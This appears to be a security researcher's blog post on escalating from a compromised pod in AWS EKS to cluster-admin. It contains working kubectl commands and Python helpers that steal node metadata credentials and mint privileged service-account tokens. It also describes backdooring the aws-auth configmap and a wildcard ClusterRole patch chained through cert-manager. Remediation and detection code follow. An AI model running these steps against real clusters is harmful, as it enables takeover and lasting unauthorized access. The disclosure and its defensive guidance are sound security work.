Privilege escalation in AWS Elastic Kubernetes Service

The team recently encountered an interesting scenario where we were trying to escalate privileges from a compromised pod in AWS Elastic Kubernetes Service (EKS) and struggled with NodeRestriction, a security mechanism enabled by default on all EKS versions.

From pod to node token

It’s well known that on a compromised AWS EC2 machine, one can query the AWS instance metadata service to obtain the machine’s IAM token.

What surprised us was that this is also possible from a container running inside that machine. There’s no default mechanism to stop that from happening (IMDSv2 tries to solve that, which will be detailed later). This means an EKS pod, no matter how low-privileged it is, has the same AWS privileges as the underlying EC2 machine. To make matters worse, the EKS API server’s endpoint is by default accessible from the internet.
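As a minimal sketch of what "requesting the metadata service" looks like from inside a pod, the snippet below follows the IMDSv2 flow (a session token via PUT, then GETs carrying that token). The helper names `http_request` and `get_node_credentials` are ours, not from the original research, and the injectable `request` parameter exists only so the logic can be exercised without a real metadata endpoint.

```python
import json
import urllib.request

IMDS = "http://169.254.169.254"  # link-local metadata address on EC2


def http_request(url, method="GET", headers=None, timeout=2):
    """Tiny urllib wrapper returning the response body as text."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def get_node_credentials(request=http_request):
    """Return (role_name, credentials_dict) for the node's instance role.

    `request` is injectable (hypothetical design choice) so the flow can
    be tested offline with a fake transport.
    """
    # IMDSv2: obtain a session token first, then send it on every GET.
    session = request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "300"},
    )
    auth = {"X-aws-ec2-metadata-token": session}
    base = f"{IMDS}/latest/meta-data/iam/security-credentials/"
    role = request(base, headers=auth).strip()
    creds = json.loads(request(base + role, headers=auth))
    return role, creds
```

On an instance that still accepts IMDSv1, the PUT step is unnecessary and the two GETs work without the session header.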

Christophe documented some of this in detail in his research [1], where he also exploited the default DeleteNetworkInterface IAM permission granted to the EC2 machine. But we wanted to see if there’s a more severe impact and explored the attack path towards EKS.

On a default EKS deployment, the node’s IAM token has the associated system:node role on the cluster. EKS facilitates this by providing a mapping between AWS identities and EKS privileges via the aws-iam-authenticator plugin (details to follow).

The system:node token, however, is severely limited by Kubernetes NodeRestriction. Some basic cluster information, such as pod definitions, is available, but not much else.

Reading the NodeRestriction documentation further, this line caught our attention:

Such kubelets will only be allowed to modify their own Node API object, and only modify Pod API objects that are bound to their node.

This means that with the node token, we can impersonate any pod on the node.

From node token to cluster-admin

Our approach was to explore the pods running on the same node as our system:node token. After hitting a few dead ends, we came up with requesting service account tokens for those pods from the API server, allowing us to impersonate them and use their privileges.

In K8s, most people don’t care which pod is deployed to which exact node, meaning a node can contain both sensitive pods and untrusted pods. By inspecting and pivoting through every pod, it’s likely we could obtain a token with higher privileges, such as one with permissions to list the cluster’s secrets.

With that assumption, we quickly spun up a test setup:

EKS cluster named cluster-1 with one node and a namespace named ns1. As of the time of writing, the default EKS version was v1.25.7-eks-a59e1f0.

Service account sa-priv bound to the ClusterRole cluster-admin (a built-in role that can take any action on any resource in the cluster)

pod1 with minimum pod privileges, running alpine

pod-priv associated with the sa-priv token, also running alpine

The flow is pretty straightforward. In fact, it’s so straightforward that we had to check multiple times whether someone had documented this behavior before.

From pod1, request the EC2 metadata IAM access token, then exchange it for an EKS token with:

$ aws eks get-token --cluster-name=cluster-1

The token should have the system:node role and look like the following:



$ kubectl config set-credentials usr1 --token="$(aws eks get-token --cluster-name=cluster-1 | jq -rc '.status.token')"

User "usr1" set.

$ kubectl config set-context node1 --cluster=cluster-1.us-west-2.eksctl.io --user=usr1

Context "node1" modified.

$ kubectl --context=node1 auth can-i --list

Warning: the list may be incomplete: node authorizer does not support user rule resolution

Resources Non-Resource URLs Resource Names Verbs

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

certificatesigningrequests.certificates.k8s.io/selfnodeserver [] [] [create]

[/api/*] [] [get]

...snipped

At this point the token’s permissions are still heavily limited by NodeRestriction.

Then request a token for pod-priv. There’s an error at this point, which disappointed us for a moment:

$ kubectl --context=node1 create token -n ns1 sa-priv

error: failed to create token: serviceaccounts "sa-priv" is forbidden: node requested token not bound to a pod

On a closer look, that does not look like an authorization error, but just a format error. Sure enough, the command requires some additional parameters: bound-object-kind, bound-object-name, bound-object-uid, all of which can be obtained easily enough from the pods definition.
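To illustrate where those three values come from, here is a small sketch that extracts them from a pod listing in JSON form. It assumes the input is the output of something like `kubectl --context=node1 get pods -A -o json`; the function name `pods_on_node` and the node name used in the usage note are hypothetical.

```python
import json


def pods_on_node(pod_list_json, node_name):
    """Yield (namespace, pod, uid, service_account) for pods on node_name."""
    for item in json.loads(pod_list_json)["items"]:
        spec = item["spec"]
        # Only pods bound to our own node are usable with the node token.
        if spec.get("nodeName") != node_name:
            continue
        meta = item["metadata"]
        yield (
            meta["namespace"],
            meta["name"],
            meta["uid"],
            spec.get("serviceAccountName", "default"),
        )
```

Calling `list(pods_on_node(listing, "my-node"))` gives one tuple per candidate pod, and the pod name and UID in each tuple are the values to pass as bound-object-name and bound-object-uid.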

After a bit of tinkering it works as expected, and we have the token for pod-priv:

$ kubectl --context=node1 create token -n ns1 sa-priv \
  --bound-object-kind=Pod \
  --bound-object-name=pod-priv \
  --bound-object-uid=7f7e741a-12f5-4148-91b4-4bc94f75998d

And finally pivot to the service account sa-priv. Notice how we have full permissions on the cluster after this.
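For readers who want to see what the kubectl command sends, the sketch below builds the equivalent TokenRequest for the Kubernetes API. The resource path and the `boundObjectRef` fields follow the `authentication.k8s.io/v1` TokenRequest API; the function name and the one-hour default lifetime are our own assumptions.

```python
import json


def token_request(namespace, service_account, pod_name, pod_uid, ttl_seconds=3600):
    """Return (API path, JSON body) for a pod-bound service account token."""
    path = f"/api/v1/namespaces/{namespace}/serviceaccounts/{service_account}/token"
    body = {
        "apiVersion": "authentication.k8s.io/v1",
        "kind": "TokenRequest",
        "spec": {
            "expirationSeconds": ttl_seconds,  # assumed lifetime, adjust as needed
            # Binding the token to a pod on the caller's node is what
            # satisfies the "node requested token not bound to a pod" check.
            "boundObjectRef": {
                "kind": "Pod",
                "apiVersion": "v1",
                "name": pod_name,
                "uid": pod_uid,
            },
        },
    }
    return path, json.dumps(body)
```

The body would be sent as a POST to the returned path, authenticated with the node's EKS token.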

The sa-priv token here is an example and does not have to have the cluster-admin role. In the real world, it could be one with permissions to list the cluster’s secrets. Either way, pivoting to cluster-admin is easier now that we have a lot at our disposal. In our case, it was just a matter of time until the cluster was compromised.

… to backdooring the EKS cluster

After taking over the cluster, we looked for ways to plant a backdoor there.

As mentioned previously, EKS maps AWS identities to EKS privileges via the aws-iam-authenticator plugin. It works by hooking into the Kubernetes API server’s authentication flow and calling the AWS STS endpoint at https://sts.amazonaws.com with the AWS EKS token (which in fact is just a thin wrapper around an AWS IAM token).

Calling STS with an IAM token would yield the caller’s role ARN, thereby identifying them. The plugin then uses the mapping in Kubernetes aws-auth configmap to map between Kubernetes roles and AWS role ARNs.
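To make the "thin wrapper" concrete: as far as we understand the aws-iam-authenticator token format, an EKS token is the prefix `k8s-aws-v1.` followed by an unpadded URL-safe base64 encoding of a presigned STS GetCallerIdentity URL. The sketch below unwraps such a token; the function names are ours, and the example URL in the usage note is made up for illustration.

```python
import base64
from urllib.parse import parse_qs, urlsplit

TOKEN_PREFIX = "k8s-aws-v1."


def decode_eks_token(token):
    """Return the presigned STS URL wrapped inside an EKS bearer token."""
    if not token.startswith(TOKEN_PREFIX):
        raise ValueError("not an aws-iam-authenticator token")
    payload = token[len(TOKEN_PREFIX):]
    payload += "=" * (-len(payload) % 4)  # restore the stripped base64 padding
    return base64.urlsafe_b64decode(payload).decode()


def describe(token):
    """Summarise which STS host, action and access key the token refers to."""
    url = urlsplit(decode_eks_token(token))
    query = parse_qs(url.query)
    return {
        "host": url.netloc,
        "action": query.get("Action", [None])[0],
        "credential": query.get("X-Amz-Credential", [None])[0],
    }
```

Running `describe` on the output of `aws eks get-token` should show a GetCallerIdentity action signed with the node's access key, which is all the API server needs to learn the caller's ARN.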

With that in mind, the idea for the backdoor is to plant a user under our control into the aws-auth datastore mapped with the system:masters group. The role ARN specified in aws-auth also does not have to belong to the same account owner as the one owning the EKS cluster, so we can just sign up a new user and plant its root role ARN there.

As demonstrated in the following, we insert a new record into aws-auth configmap with an external user’s token and retain the admin privileges on it for as long as that config still exists.

Notice how the Kubernetes permissions differ before and after the changes to aws-auth.

Additionally, this attack vector does not rely on the AWS IAM role’s permissions, meaning it still works even if the EC2’s IAM role is revoked of all permissions. This is because aws-iam-authenticator only verifies the role ARN (the AWS identity) of the caller and maps it via the aws-auth configmap; it does not consider the token’s current actual permissions.
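From the defender's side, one way to spot this kind of backdoor is to look for principals in aws-auth that belong to an AWS account you do not own. The sketch below is a rough check under that assumption: it scans the configmap text (for example from `kubectl -n kube-system get configmap aws-auth -o yaml`) for IAM or STS ARNs and reports those outside a trusted set of account IDs. The function name and the account IDs in the usage note are hypothetical.

```python
import re

# Matches IAM/STS ARNs and captures the 12-digit account ID.
ARN_RE = re.compile(r"arn:aws[\w-]*:(?:iam|sts)::(\d{12}):[\w+=,.@/-]+")


def foreign_principals(aws_auth_text, trusted_accounts):
    """Return ARNs in aws-auth whose account ID is not in trusted_accounts."""
    return [
        match.group(0)
        for match in ARN_RE.finditer(aws_auth_text)
        if match.group(1) not in trusted_accounts
    ]
```

For a cluster owned by account 111111111111, `foreign_principals(text, {"111111111111"})` returning a non-empty list is a signal worth investigating, especially when the entry is mapped to system:masters.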

Remediation

The way we see it, there are two problems in EKS that are the root causes:

Pods are allowed to fetch their node’s metadata, and

EC2’s IAM access tokens can be exchanged for an EKS system:node token.

Addressing this is not straightforward and would need a lot of planning. We still recommend making this a priority due to how feasible it is to exploit in the real world.

To address the first problem, the AWS IMDSv2 feature can block pods from reaching their node’s metadata by setting http_put_response_hop_limit to 1, following the official security hardening recommendations. Using a custom iptables rule on all nodes could also work as an alternative. Christophe in his research also detailed several ways to achieve this. Pursuing this strategy, however, could be problematic for several important services that require communication from pod to instance metadata, like Terraform.
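A minimal sketch of applying that setting to an existing instance through the EC2 ModifyInstanceMetadataOptions API is shown below. The hop limit only constrains the IMDSv2 token response, so the sketch also sets HttpTokens to required to reject token-less IMDSv1 requests. It assumes boto3 is installed and credentials are configured; the helper names and the instance ID in the usage note are placeholders.

```python
def imds_hardening_options(instance_id, hop_limit=1):
    """Keyword arguments for EC2 ModifyInstanceMetadataOptions."""
    return {
        "InstanceId": instance_id,
        "HttpEndpoint": "enabled",
        # Reject IMDSv1 (token-less) requests; the hop limit alone does not.
        "HttpTokens": "required",
        # A limit of 1 stops the token response at the first network hop.
        "HttpPutResponseHopLimit": hop_limit,
    }


def harden_instance(instance_id, region):
    """Apply the options to one instance (requires boto3 and AWS credentials)."""
    import boto3  # third-party; imported lazily so the helper above stays dependency-free

    ec2 = boto3.client("ec2", region_name=region)
    return ec2.modify_instance_metadata_options(**imds_hardening_options(instance_id))
```

For example, `harden_instance("i-0123456789abcdef0", "us-west-2")` would update a single node. For managed node groups the same options are better set in the launch template so that replacement nodes inherit them.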

As for the other problem of EC2 IAM role being granted EKS system:node role, we have yet to find a practical way of remediating it other than waiting for a future update, if any, from AWS.

Finally, as defense-in-depth, it’s wise to move untrusted services in the cluster to an isolated node, resembling the concept of a DMZ in traditional networking architecture. Kubernetes provides many ways to assign pods to specific nodes and facilitate this type of isolation. And while we’re at it, limit or turn off the default internet access to the cluster’s API endpoint.

Update Nov 27, 2023:

We found a straightforward privilege escalation vector in EKS clusters that use cert-manager for managing certificates.

The attack works as follows:

1/ Use the same attack vector explained above to obtain the service account token for cert-manager.

We found that the cert-manager service account has full pod permissions.

2/ Use the cert-manager service account to create a new pod, and attach privileged service accounts into that pod.

For example, we can attach the clusterrole-aggregation-controller service account. According to the default policy in K8s, clusterrole-aggregation-controller has full permissions on cluster roles to allow it to mutate them in any way.

3/ Patch any cluster role to add the following additional permissions to become cluster-admin. To the best of our knowledge, this technique was first discussed by Raesene [2].

    - apiGroups:
      - '*'
      resources:
      - '*'
      verbs:
      - '*'

cert-manager needs full permissions on pod resources because it creates a new pod during HTTP-01 challenge validation.

In summary, this chaining of several privilege escalation steps can quickly and stealthily result in full cluster compromise.

To mitigate this attack path, we recommend revoking the pod creation permission granted to cert-manager and switching to DNS-based domain verification.